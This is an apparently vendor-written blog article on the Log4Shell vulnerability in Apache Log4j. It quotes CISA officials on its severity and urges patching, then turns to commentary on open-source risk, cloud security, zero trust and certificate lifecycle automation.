It has been a week since it was discovered that a recent version of a seemingly harmless open-source logging application called Log4j contained a critical information security vulnerability. Organizations were on their toes sending out security advisories, and the product teams were trying all possible measures to develop remediation patches for the vulnerability.
What is Log4J, and why does it have all the technology firms worried?
“The Cybersecurity and Infrastructure Security Agency (CISA) and its partners, through the Joint Cyber Defense Collaborative, are responding to active, widespread exploitation of a critical remote code execution (RCE) vulnerability (CVE-2021-44228) in Apache’s Log4j software library, versions 2.0-beta9 to 2.14.1, known as “Log4Shell.”
“Log4j is very broadly used in a variety of consumer and enterprise services, websites, and applications—as well as in operational technology products—to log security and performance information. An unauthenticated, remote actor could exploit this vulnerability to take control of an affected system.”
The vulnerability affects multiple versions of Log4j and the applications that depend on it. Organizations were urged to review and monitor the Apache Log4j Security Vulnerabilities webpage for updates and mitigation guidance.
Remediation of these vulnerabilities in products and services using affected versions of Log4J would require the implementation of security updates by product users. Users of such affected products and services should refer to the respective product vendors for security updates. The CISA urged all vendors to take immediate steps to identify, mitigate and update Log4J affected products to the latest version. The vendors sent out advisories to all end-users while strongly urging them to prioritize software updates.
What is the issue?
The vulnerability gives many opportunities to an attacker to download and execute a malicious payload. This happens when a carefully crafted request is submitted to the vulnerable system. Once the request is submitted, attackers can gain access to execute arbitrary code loaded from the Lightweight Directory Access Protocol (LDAP) servers. This happens post logging of message parameters when message lookup substitution is enabled. Since many popular frameworks have Log4j included, the severity of the impact becomes multifold.
CISA Director, Jen Easterly told industry leaders that a vulnerability in a widely-used logging library “is one of the most serious I’ve seen in my entire career.”
“We expect the vulnerability to be widely exploited by sophisticated actors, and we have limited time to take necessary steps to reduce the likelihood of damage,” she said of the Apache Log4j flaw. “An unauthenticated, remote execution vulnerability could allow an intruder to take over an affected device.”
Hundreds of millions of devices are likely to be affected, and it is going to take “sustained effort” for organizations to become secure, with diligence needed even after applying patches from Apache, said Jay Gazlay of CISA’s vulnerability management office.
“There’s no single action that fixes this issue,” Gazlay said. It’s a mistake to think anyone is “going to be done with this in a week or two.”
Thoughts to ponder upon
Challenges give birth to innovations. Gartner’s Hype Cycle for identity and access management (IAM) 2021 emphasizes the maturation of innovations that deliver security, risk management, and business value for the customer and workforce IAM.
Abide by industry best practices when it comes to deploying open source in enterprise software
The risks associated with the deployment of open source are here to stay. This calls for a structured and well-defined policy to manage such risks efficiently. Information security personnel need to be careful and diligent when assessing such risks. All risk parameters need to be carefully documented, following industry best practices.
New security challenges in cloud adoption
Despite the rising trend, many organizations continue to be dissatisfied with their cloud adoptions. The failure to achieve “desired operational agility” by moving to the cloud has become a question mark. One of the most cited roadblocks to realizing cloud adoption success is, surprisingly, cloud security.
It’s not the cloud but the lack of understanding of the cloud security model that threatens cybersecurity and agility. Another misstep taken by most organizations is to extend their on-premise or perimeter-based security solutions to the cloud.
Organizations must rethink their cybersecurity approach to remove security issues from the cloud success equation. Instead of fixing the perimeter, organizations must reinforce machine identity management and implement a zero-trust framework to secure multicloud and hybrid cloud environments.
Zero Trust networks are the future
Identity is the new network perimeter, and verification of digital identities on your network is central to a zero-trust strategy. However, many organizations mistakenly assume that limiting verification to user identities is sufficient. True zero trust implementation relies upon certificates and key pairs to strengthen security and ensure device verification in addition to identity verification.
Companies adopting the zero trust model start with segmentation, implementing privilege access management (PAM), multi-factor authentication (MFA), vulnerability and patch management, and security analytics. However, they miss out on one key area: managing machine identities through digital certificates and keys. It ignores the risk with compromised encryption tunnels while focusing heavily on access controls.
It’s clear that digital certificates contribute much to a zero-trust architecture, but there’s a real need for a managed solution with automation of the certificate lifecycle at its core. Hence implementing a next-gen certificate lifecycle automation solution is a key initiative towards achieving a fully functional zero trust model.